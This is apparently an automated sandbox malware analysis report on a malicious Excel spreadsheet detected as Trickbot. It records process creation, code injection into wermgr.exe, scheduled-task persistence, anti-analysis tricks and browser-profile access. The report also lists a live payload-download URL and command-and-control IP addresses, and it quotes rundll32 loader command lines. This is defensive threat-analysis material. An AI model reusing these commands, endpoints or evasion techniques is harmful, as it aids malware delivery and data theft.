Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\wermgr.exe System information queried: HandleInformation Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls Virustotal: Detection: 11%
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor8751465376\kiBASEzv.rrd',DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor8751465376\kiBASEzv.rrd',DllRegisterServer Jump to behavior
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2092653960.000000006E849000.00000002.00020000.sdmp, BASE.BABAA.0.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D1BD0 push dword ptr [edx+14h]; ret 4_2_003D1CDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D1CFD push dword ptr [edx+14h]; ret 4_2_003D1CDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D1C7A push dword ptr [edx+14h]; ret 4_2_003D1CDD
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007D0F0 push 8B48D233h; iretd 6_2_0007D0F5

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\BASE.BABAA Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\BASE.BABAA Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\BASE.BABAA Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\BASE.BABAA Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wermgr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\System32\wermgr.exe Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,handleClosed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\wermgr.exe RDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007FC0D4A30B70h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007FC0D4A28A06h 0x00000048 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006EAD0 rdtsc 6_2_0006EAD0
Contains functionality to query network adapater information
Source: C:\Windows\System32\wermgr.exe Code function: GetAdaptersInfo, 6_2_000784E0
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\taskeng.exe TID: 592 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\wermgr.exe Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061290 FindFirstFileW, 6_2_00061290
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW, 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW, 6_2_0007FBB0

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006EAD0 rdtsc 6_2_0006EAD0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00073070 LdrLoadDll, 6_2_00073070
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E83B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E83B044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E83B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E83B044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E837DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_6E837DE5
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00082060 SetCurrentDirectoryW,SleepEx,SetTimer,RtlAddVectoredExceptionHandler, 6_2_00082060

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 60000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: FFC493F8 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor8751465376\kiBASEzv.rrd',DllRegisterServer Jump to behavior
Source: wermgr.exe, 00000006.00000002.2353283553.00000000007A0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: wermgr.exe, 00000006.00000002.2353283553.00000000007A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000006.00000002.2353283553.00000000007A0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Trickbot
Source: Yara match File source: 00000004.00000002.2091575281.00000000006D0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091432238.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2092159762.00000000021E8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2087481809.0000000000704000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2087500682.0000000000704000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSecurityPreloadState.txt Jump to behavior
Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultcompatibility.ini Jump to behavior
Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultAlternateServices.txt Jump to behavior
Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSiteSecurityServiceState.txt Jump to behavior

Remote Access Functionality:

barindex
Yara detected Trickbot
Source: Yara match File source: 00000004.00000002.2091575281.00000000006D0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091432238.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2092159762.00000000021E8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2087481809.0000000000704000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2087500682.0000000000704000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 355603 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 20/02/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 9 other signatures 2->48 8 EXCEL.EXE 84 41 2->8         started        13 taskeng.exe 1 2->13         started        process3 dnsIp4 32 www.chipmania.it 8->32 34 chipmania.it 185.81.0.78, 49167, 80 SERVERPLAN-ASIT Italy 8->34 28 C:\Users\user\BASE.BABAA, PE32 8->28 dropped 30 C:\Users\user\AppData\Local\...\10[1].jjkes, PE32 8->30 dropped 60 Document exploit detected (process start blacklist hit) 8->60 62 Document exploit detected (UrlDownloadToFile) 8->62 15 rundll32.exe 8->15         started        17 rundll32.exe 13->17         started        file5 signatures6 process7 process8 19 rundll32.exe 15->19         started        signatures9 50 Writes to foreign memory regions 19->50 52 Allocates memory in foreign processes 19->52 22 wermgr.exe 19->22         started        25 wermgr.exe 4 4 19->25         started        process10 dnsIp11 54 Tries to detect virtualization through RDTSC time measurements 22->54 56 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 22->56 36 36.94.62.207, 443, 49174, 49176 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 25->36 38 103.61.101.11, 447, 49177 ELXIREDATA-AS-INELXIREDATASERVICESPVTLTDIN India 25->38 40 9 other IPs or domains 25->40 58 Tries to harvest and steal browser information (history, passwords, etc) 25->58 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.61.101.11
unknown India
133647 ELXIREDATA-AS-INELXIREDATASERVICESPVTLTDIN true
142.202.191.164
unknown Reserved
398019 DYNUUS true
95.217.228.176
unknown Germany
24940 HETZNER-ASDE false
185.81.0.78
unknown Italy
52030 SERVERPLAN-ASIT false
194.5.249.156
unknown Romania
64398 NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO false
36.94.62.207
unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
134.119.186.202
unknown Germany
29066 VELIANET-ASvelianetInternetdiensteGmbHDE false

Contacted Domains

Name IP Active
chipmania.it 185.81.0.78 true
wtfismyip.com 95.217.228.176 true
38.52.17.84.zen.spamhaus.org unknown unknown
38.52.17.84.cbl.abuseat.org unknown unknown
38.52.17.84.dnsbl-1.uceprotect.net unknown unknown
www.chipmania.it unknown unknown
38.52.17.84.b.barracudacentral.org unknown unknown
38.52.17.84.spam.dnsbl.sorbs.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.chipmania.it/mails/open.php true
  • 5%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://wtfismyip.com/text false
    high